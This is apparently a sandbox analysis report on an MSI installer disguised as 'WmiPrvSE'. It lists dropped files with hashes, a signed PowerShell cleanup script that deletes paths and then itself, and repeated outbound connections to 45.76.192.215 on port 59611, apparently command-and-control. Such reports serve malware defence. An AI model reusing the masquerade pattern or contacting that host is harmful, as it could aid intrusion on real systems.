                                        SHA-512:AC26973C2C0FF93ABDF9C074100FCB8ED66AE6090CC9A9D88566775E4B6BD549435B758F4FBBE8BEAED05C88A786C2BF7A612437143AC96FD8A4C32AEF0591F8
                                        Malicious:false
                                        Preview:0..+......$0.. ..+.....0......0...0.........C.....H....R...W..20240803193619Z0v0t0L0...+.........A..HNF;.ZEW..}...@...A)...cl.i...)..Hj0...3.....PK..............20240730201228Z....20240907200105Z0...*.H...............k3....F.^...t...G.H.x.B...X,.g...\....0../T.......l.@L......ng...mzEFS.}.9........F..m...b.....2f..:5.9.......`B[...v.*P.!y..NG.......8..9..A.....>..S...Q.r....S..]..&.{.v..k.M.-........>..*...I.c.t-~...,.gL.r6..%...V].g..4R....P.T.8nW....E.F'..?...}(.....p.d..m>.&.$..X.......^r.&....X..$?..{....L.x.~.F.>f..&....}>..M...,.l...T.8....y7..6...[.22.....V..i.....c.$.......F.g.St~Oe#......m....K&f...u"$...}0;..6...V...:..G..%.....Z.44q.F\=+..R9r..R.>P'b..._...U|.>..(.mL.5Q?1..%.X............Q0..M0..I0..1.......3........V.@.......0...*.H........0c1.0...U....US1.0...U....Microsoft Corporation1402..U...+Microsoft ID Verified Code Signing PCA 20210...240307200105Z..240907200105Z0..1.0...U....US1.0...U....WA1.0...U....Redmond1.0...U....Microsoft1.0...U....PK
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):785
                                        Entropy (8bit):7.447636436755226
                                        Encrypted:false
                                        SSDEEP:12:oN89GXuBF845RG8CDS0/+U0TaCpezPqsXIUoWAl7+n96VY60ZvJjfTvv:79AuD845RDCDXc6zPqsXJAN+9QWJjLvv
                                        MD5:3321D4AAFB831E6C80A73E8F0002E60A
                                        SHA1:8093CD614240A4A242771668C5EF63CA657ABC31
                                        SHA-256:8D71482B7F06568DF7FABAA824DED89923BB245D82F44E6A0E1AB726B9127A70
                                        SHA-512:D1B1E221D28C5305219B9814C6D5FE689BE2AB71FB678ECFA15E214F4DADEECEB8A60C6B83099D92DD91841FF8B03D6F0FF6BC698B60974EC28088B2C7477633
                                        Malicious:false
                                        Preview:0...0.....0...*.H........0c1.0...U....US1.0...U....Microsoft Corporation1402..U...+Microsoft ID Verified Code Signing PCA 2021..240730201228Z..241029083228Z._0]0...U.#..0....A)...cl.i...)..Hj0.0...+.....7.......0...U.......0...+.....7......241028202228Z0...*.H..............'x....m$I.-.UZRs.)b.`d....<.CTe.QL...l.....=..nf#0....}....}}_....!`.s..`.R....,.......&.$L".YbzQ.p,....y..Z..e)!.1.#.IT......%.B...../....x.i8f8..b.a!..}.......%L..l.r.I...7....}Yi...1.....|q..G..g._.$..;.....S...B........S....c7...<.tG.<.H...!)jcG#....v=.p.:...if....k.h...7..o^.x.i......:c..0W..SLg..|....M.6C........lW._#2%.5....;.i}..h....]y..\..}.wr..!..O.Z3............|?@.... ....e^.....r".*..4x......T......5..ae1...,..K...i...4p.I ..G..|....:.zR.@...R....:n...@Z..G.X...l.l{.0.
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):290
                                        Entropy (8bit):3.0043737168752243
                                        Encrypted:false
                                        SSDEEP:3:kkFkl6qRN/XfllXlE/U3/snXlRDjdClRRly+MlMTlPNylRal1VdlV0lQWKAX4VhF:kKRyN/TspB7WTlpl19ml5o8lAfl1j
                                        MD5:3F4605A19BB47398356A08A19500AFC4
                                        SHA1:D4EF416691BAC5DB47E2AD80EF4B735AF52848C5
                                        SHA-256:D607E2C32E8EDEC356400F4A29B8FDA28B310BF4BE4C0B9E5A473CF3DFA095AF
                                        SHA-512:0B63D3F1CFDBDB661C35C789D2324805E93941DC81B0FBBC5929E12C2FE78CA27FD69EBEBC579C697137CE007B23D317A847A90EA62EA54A4AE83989F604A23A
                                        Malicious:false
                                        Preview:p...... ...........dK...(....................................................... ........1..7.......................h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.p.k.i.o.p.s./.c.r.l./.M.i.c.r.o.s.o.f.t.%.2.0.I.D.%.2.0.V.e.r.i.f.i.e.d.%.2.0.C.S.%.2.0.A.O.C.%.2.0.C.A.%.2.0.0.2...c.r.l...
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):338
                                        Entropy (8bit):3.2664400712956687
                                        Encrypted:false
                                        SSDEEP:6:kKLTglFsN+SkQlPlEGYRMY9z+s3Ql2DUevat:zTITkPlE99SCQl2DUevat
                                        MD5:A33149C14252A02CD5F8651D9BE74A0D
                                        SHA1:1B72B8E3330319D311F6C73AFDA9BD09781ED8F1
                                        SHA-256:AFFE1E8B47CE54F3E4B3E35DBECF8AF6F2367663EBE4D8BA0B9128787B8445D7
                                        SHA-512:94C0B9559DBC144BFF8CFBBB469B42D99EAC36B185A8D64EEF579CECEB36CF4140C362FB9A28770B21D49280736BAF3A02228FC33FEAA98C0C05093C7CA1AF0B
                                        Malicious:false
                                        Preview:p...... ............K...(....................................................... .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):556
                                        Entropy (8bit):3.9028380000862817
                                        Encrypted:false
                                        SSDEEP:12:/ljUXlqcWuxlX9ysFuuPtuRaoKpRCuzfXAMkM:N+WuxlX9VkuVu4oKRJXjt
                                        MD5:F95396EC7B07E7111125D0A27A9A8EAB
                                        SHA1:E90784E238AA4581F0C2D2D57A764885D15A36F5
                                        SHA-256:607786D9CCE1E789F2EED2CA6BC777409E3CE91935A9AE2389A4011DDAD641DC
                                        SHA-512:577E0DFE8593EF72A93C5C1406DB0C34F9CC5C517A2F68ABDF15DF8A4E1D749A22F0CF7ADBD013FCA6144337B50B77763A1EB028FEBE4DB6625D796258C8F18E
                                        Malicious:false
                                        Preview:p...... ....2....*.AK...(................A"-v.......^.......................^... ................Q..............d...h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.D.H.s.f.u.q.f.u.b.d.3.p.i.h.v.q.4.m.g.Q.V.W.g.H.W.N.w.Q.U.y.H.7.S.a.o.U.q.G.8.o.Z.m.A.Q.H.J.8.9.Q.E.E.9.o.q.K.I.C.E.z.M.A.A.A.A.H.h.6.M.0.o.3.u.l.j.h.w.A.A.A.A.A.A.A.c.%.3.D...".8.6.8.9.7.e.8.8.4.f.7.0.9.4.5.f.f.2.4.2.8.e.8.9.e.9.e.7.9.c.f.7.9.2.d.9.e.6.3.e.b.8.4.0.a.4.f.3.6.5.5.4.f.d.e.5.a.6.5.9.a.5.d.3."...
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):556
                                        Entropy (8bit):3.6358766901409694
                                        Encrypted:false
                                        SSDEEP:12:QUelScWuxlX9ysFF31c5XC0Jt8Wy+gBBuFBK36t:Q3WuxlX9VP31WC0JKLTBMK30
                                        MD5:DE8C4105453D7A91D9E7A53C567D889D
                                        SHA1:E6642411BC871E18EB371234D7916915676DB98E
                                        SHA-256:C81CD1B5FA74266A1F1D2A1B8B08F2D1F50C89DDDB0A2C4D1F5EE5DE4550FA8D
                                        SHA-512:9949F4C2050C5449690D77BCB5657688D7B9D9E3E7419EC46452E6A824333A38106A6A11AB9110408A82FA02DD171977EEF7E54B0101C88B0BE98A14752C9AF0
                                        Malicious:false
                                        Preview:p...... ....2....8)SK...(....................................................... ................Q..................h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.0.N.E.4.6.k.r.j.t.I.f.f.E.j.0.l.0.0.l.c.k.K.s.L.u.f.g.Q.U.J.E.W.Z.o.X.e.Q.K.n.z.D.y.o.O.w.b.m.Q.W.h.C.r.4.L.G.c.C.E.z.M.A.A.J.U.c.t.0.c.L.3.m.p.2.O.v.k.A.A.A.A.A.l.R.w.%.3.D...".8.b.9.8.e.8.0.c.0.a.6.a.b.f.d.8.0.0.d.5.3.f.e.d.9.f.4.6.d.1.2.4.9.c.f.3.a.d.0.8.f.c.7.6.1.d.6.c.4.5.c.c.2.1.6.0.0.6.4.a.c.7.6.6."...
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):560
                                        Entropy (8bit):3.5947218382925348
                                        Encrypted:false
                                        SSDEEP:12:JyQvtllcWuxlX9ysFPH+ee+lHRoW+i4tivT2Cf1dmwhp:J7v+WuxlX9Va+lHd0ti6Cf1zp
                                        MD5:246FD46B3490400AFA5C5618E1BAF909
                                        SHA1:97C26C1781A45C4217E12FE7B3059DCB77F1C3CB
                                        SHA-256:3D28A5ECD8F1835CA662B5289D1FAD94692D77E10BC1454579E463A9016BC062
                                        SHA-512:351D86FAD6495E8B39919EA4C3CD2E2FC00EA1F7E18FF0832063EB752D51475771FE7BA7020D8E1D6245AFDC6EFB750E9BA77D5539E5631FD786960B487F53A0
                                        Malicious:false
                                        Preview:p...... ....6...9c.RK...(....................................................... .........Z.8....Q............../...h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.O.Q.Y.L.F.S.E.5.G.O.%.2.F.p.a.R.V.f.Y.u.7.d.9.g.Z.E.b.Q.A.Q.U.2.U.E.p.s.A.8.P.Y.2.z.v.a.d.f.1.z.S.m.e.p.E.h.q.M.O.Y.C.E.z.M.A.A.A.A.E.l.l.B.L.0.t.v.u.y.4.g.A.A.A.A.A.A.A.Q.%.3.D...".8.3.a.d.b.e.1.4.a.4.a.b.4.0.a.c.e.d.e.d.c.3.9.7.7.1.5.5.3.9.3.c.3.f.9.6.c.c.a.2.9.3.7.a.0.c.b.9.d.9.f.9.c.2.f.2.b.c.4.1.c.8.b.4."...
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):308
                                        Entropy (8bit):3.107978871147884
                                        Encrypted:false
                                        SSDEEP:6:kKAFglkSiDl7B7WTlpl19ml55Pe7lkaElRMj:4FgZiDlt0p39MPe7+apj
                                        MD5:75D9AE06D4E6B8D2D4727977DBFE6500
                                        SHA1:86233CE8BFFB9DE29D657D703C24C99AB3DAC0E3
                                        SHA-256:D2EEC28FB6B5F3030A1E8A9CED1CE5CED16D6829C04B1EF4CC8B36B93AFD86E0
                                        SHA-512:55BC872586C598032E689BDA9CD4580F97DE0CBE2942404AECCA1D8DF46CE88E8B2BBBBEB05CA33DCC25D1498AB9A1FF5CA1A18F8807E5789233C675E9BF7164
                                        Malicious:false
                                        Preview:p...... .........._K...(....................................................... ..........$........................h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.p.k.i.o.p.s./.c.r.l./.M.i.c.r.o.s.o.f.t.%.2.0.I.D.%.2.0.V.e.r.i.f.i.e.d.%.2.0.C.o.d.e.%.2.0.S.i.g.n.i.n.g.%.2.0.P.C.A.%.2.0.2.0.2.1...c.r.l...
                                        Process:C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):23157
                                        Entropy (8bit):6.027744169890565
                                        Encrypted:false
                                        SSDEEP:384:gsgQpJjMUUm3Bwr2sGjFsbAeXqom+056H46ft7kpWkXq3OD1uz9pmfBYyEpGnQx1:eQpJjMUU+JsK2XYSF7MQpSBYXAnQx1
                                        MD5:E7E28EB10AA6A99ADF64C4849E33708A
                                        SHA1:01D0CD74385A0CC88AAD9BEC1C16C92FB6D1C605
                                        SHA-256:2A2267D05F9FBC4127DD239772B28FE5B77915564CD38EF040299C6FD8B3C406
                                        SHA-512:FE28356A2DBF7A8836C0148B13F060FD7C1A6A5EDD828483A863AF3AE3FAE1A3970DD02B84E673D7722629F234764418837F0F4FDE363BE2BDDF626052784614
                                        Malicious:false
                                        Preview:param(.. [Parameter(Mandatory = $true)].. [string[]]$paths,.. [int]$retry_count = 0..)....# Delete paths using parallel jobs. ..$jobs = $paths | ForEach-Object {.. Start-Job -ScriptBlock {.. param(.. [string]$path,.. [int]$retry_count = 0.. ).... if (Test-Path -LiteralPath $path) {.. $count = 0.. while ($true) {.. Remove-Item -LiteralPath $path -Force.. if (-not (Test-Path -LiteralPath $path) -or ($count -ge $retry_count)) {.. return;.. }.. $count++.. Start-Sleep -s 5 #sleep 5 seconds.. } .. }.. } -ArgumentList $_, $retry_count ..}....# Wait for the delete jobs to finish..Wait-Job -Job $jobs....# Self delete..Remove-Item -Path $MyInvocation.MyCommand.Source....# SIG # Begin signature block..# MII9SwYJKoZIhvcNAQcCoII9PDCCPTgCAQExDzANBglghkgBZQMEAgEFADB5Bgor..# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMC
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):73728
                                        Entropy (8bit):0.11829170150874367
                                        Encrypted:false
                                        SSDEEP:24:gCucm+dB8qxipV+dB8qP+dB8qxipV+dB8qPAEV+/jCyhMVPwGAqvHl+R:gbcJdZSkdudZSkdXAEkrCym6CHl
                                        MD5:304C64C14B655A0D6F41D025FD917D30
                                        SHA1:6593E5B4F2F35D1DF8E380A7EFA1AD457E57830A
                                        SHA-256:A507473A3D964578DB8AC4611812C1121BBBD72202EE2BAB24F2AA6E9BD022E8
                                        SHA-512:E7BBB85127F714D5FFA3206A84E6FA5B5DEEB8A60979C8602AE32827B0034E6EDF0A22DAB37D5A35248E4AEAB48DD554868579B133A4B0671E491DB5CBD663C4
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5161050850670992
                                        Encrypted:false
                                        SSDEEP:48:D8Phj7uRc06WXJWnT5RoH8dZSkdXAEkrCym6EdZSkdDck:qhj71tnTPoeWRC82q
                                        MD5:1C4423D880CA1C10C18BA64298517241
                                        SHA1:53F5312D93E15DAB8C6FE617922712E400852D27
                                        SHA-256:8D97F495FC2F19C707323754F8E33E2815B10EDBA42DEE913883B42BCDCD5E0F
                                        SHA-512:8CEA158E638C28ECA04FF558C631715DE166407EEA272C2BD0B8257A47AC4180F5772373FF7C064E365A51DA6CC98033126160EDB33DC6E4C1CF81C0CDC924AE
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):0.0714012481960479
                                        Encrypted:false
                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOJUCIgVky6lit/:2F0i8n0itFzDHF4it/
                                        MD5:B5D3CCDD60E08B22E08EE9BFED930627
                                        SHA1:043F13AB96F0EC28FAA90E6E99AE5804D34BA98F
                                        SHA-256:D5A511FBAD0AD0E2FF9DAD323E4AA03CFDDD13F86BD98E6DE09AB6EFF624F31F
                                        SHA-512:F61A9D372D5866AD2FE1764F92A56EBB085F9F04FB9E7ACB9503E1403C3055425B8B7A241258837C9DC823C9D011F4B9CBE9CCC738FB7F3933CDA27890B7C6D2
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5161050850670992
                                        Encrypted:false
                                        SSDEEP:48:D8Phj7uRc06WXJWnT5RoH8dZSkdXAEkrCym6EdZSkdDck:qhj71tnTPoeWRC82q
                                        MD5:1C4423D880CA1C10C18BA64298517241
                                        SHA1:53F5312D93E15DAB8C6FE617922712E400852D27
                                        SHA-256:8D97F495FC2F19C707323754F8E33E2815B10EDBA42DEE913883B42BCDCD5E0F
                                        SHA-512:8CEA158E638C28ECA04FF558C631715DE166407EEA272C2BD0B8257A47AC4180F5772373FF7C064E365A51DA6CC98033126160EDB33DC6E4C1CF81C0CDC924AE
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2178193346019772
                                        Encrypted:false
                                        SSDEEP:48:7gr7unM+CFXJ1T53oH8dZSkdXAEkrCym6EdZSkdDck:Ur79dTBoeWRC82q
                                        MD5:CD59CEE0ABB1DD477BC7369ADCA4015D
                                        SHA1:B982812D095E76759152CB41E9A3B77B26372291
                                        SHA-256:6983FA5664C214189D7EA5037E47D9322187A79BD43CDCE98B23A268155234C9
                                        SHA-512:3ACAB5C6FA836E38AAD209A55F3139AE3EB3001745186F1D520E23976AD3E8D086128328B26F51E59A85D3DAE1F67F0AC0636B4C3BBE423CC226F14FB3588B58
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2178193346019772
                                        Encrypted:false
                                        SSDEEP:48:7gr7unM+CFXJ1T53oH8dZSkdXAEkrCym6EdZSkdDck:Ur79dTBoeWRC82q
                                        MD5:CD59CEE0ABB1DD477BC7369ADCA4015D
                                        SHA1:B982812D095E76759152CB41E9A3B77B26372291
                                        SHA-256:6983FA5664C214189D7EA5037E47D9322187A79BD43CDCE98B23A268155234C9
                                        SHA-512:3ACAB5C6FA836E38AAD209A55F3139AE3EB3001745186F1D520E23976AD3E8D086128328B26F51E59A85D3DAE1F67F0AC0636B4C3BBE423CC226F14FB3588B58
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2178193346019772
                                        Encrypted:false
                                        SSDEEP:48:7gr7unM+CFXJ1T53oH8dZSkdXAEkrCym6EdZSkdDck:Ur79dTBoeWRC82q
                                        MD5:CD59CEE0ABB1DD477BC7369ADCA4015D
                                        SHA1:B982812D095E76759152CB41E9A3B77B26372291
                                        SHA-256:6983FA5664C214189D7EA5037E47D9322187A79BD43CDCE98B23A268155234C9
                                        SHA-512:3ACAB5C6FA836E38AAD209A55F3139AE3EB3001745186F1D520E23976AD3E8D086128328B26F51E59A85D3DAE1F67F0AC0636B4C3BBE423CC226F14FB3588B58
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2178193346019772
                                        Encrypted:false
                                        SSDEEP:48:7gr7unM+CFXJ1T53oH8dZSkdXAEkrCym6EdZSkdDck:Ur79dTBoeWRC82q
                                        MD5:CD59CEE0ABB1DD477BC7369ADCA4015D
                                        SHA1:B982812D095E76759152CB41E9A3B77B26372291
                                        SHA-256:6983FA5664C214189D7EA5037E47D9322187A79BD43CDCE98B23A268155234C9
                                        SHA-512:3ACAB5C6FA836E38AAD209A55F3139AE3EB3001745186F1D520E23976AD3E8D086128328B26F51E59A85D3DAE1F67F0AC0636B4C3BBE423CC226F14FB3588B58
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {9AD54326-34E0-4D44-AFB7-7A7E831CAF55}, Number of Words: 2, Subject: WmiPrvSE, Author: WmiPrvSE, Name of Creating Application: WmiPrvSE (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install WmiPrvSE. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Jul 11 10:40:05 2024, Number of Pages: 200
                                        Entropy (8bit):6.707780137964601
                                        TrID:
                                        • Windows SDK Setup Transform Script (63028/2) 47.91%
                                        • Microsoft Windows Installer (60509/1) 46.00%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                        File name:1eSOBjseu2.msi
                                        File size:3'488'768 bytes
                                        MD5:616bc662c460329dd73754a96e59277b
                                        SHA1:0131fc44067c83e3efd8dfe12029e7df0b44f4a3
                                        SHA256:29dd2916c20e18b713a8ecb72d3df632961e818cf35484ec6bafedc2ff415680
                                        SHA512:025c88ddd38c61c1e0a96cfffc6eab551e633851b3d43f6512ed3b6232ec4fcc98217cb6d524b471269717d7242a8648683dc6557a8c98648baaa888d0dd837c
                                        SSDEEP:49152:rDjlabwz90h5lmAnAis277zMRH51yB5k+q4E5q8g73SQLWj1s9w4Uf5rXf63h0er:HqwqhLS4776R+XMQyj1s9wP
                                        TLSH:9BF59D21F2C7C036D16D0172A92DEE5F9139BE670B3154EBB7E83AAE48B48C15635F12
                                        File Content Preview:........................>...................6...........................................................................L.......R.......y...............................................................>...?...@...A...B...C...D...E...F......................
                                        Icon Hash:2d2e3797b32b2b99
                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 4, 2024 10:49:21.864109039 CEST4970959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:21.933106899 CEST596114970945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:21.933213949 CEST4970959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:21.973643064 CEST4970959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:21.978530884 CEST596114970945.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:25.974308014 CEST4970959611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:26.105143070 CEST4971059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:26.110281944 CEST596114971045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:26.110424042 CEST4971059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:26.110861063 CEST4971059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:26.116303921 CEST596114971045.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:30.113759995 CEST4971059611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:30.458590984 CEST4971359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:30.463829041 CEST596114971345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:30.463910103 CEST4971359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:30.464572906 CEST4971359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:30.472089052 CEST596114971345.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:34.473035097 CEST4971359611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:34.616969109 CEST4971559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:34.621902943 CEST596114971545.76.192.215192.168.2.8
                                        Aug 4, 2024 10:49:34.621975899 CEST4971559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:34.622230053 CEST4971559611192.168.2.845.76.192.215
                                        Aug 4, 2024 10:49:34.627129078 CEST596114971545.76.192.215192.168.2.8
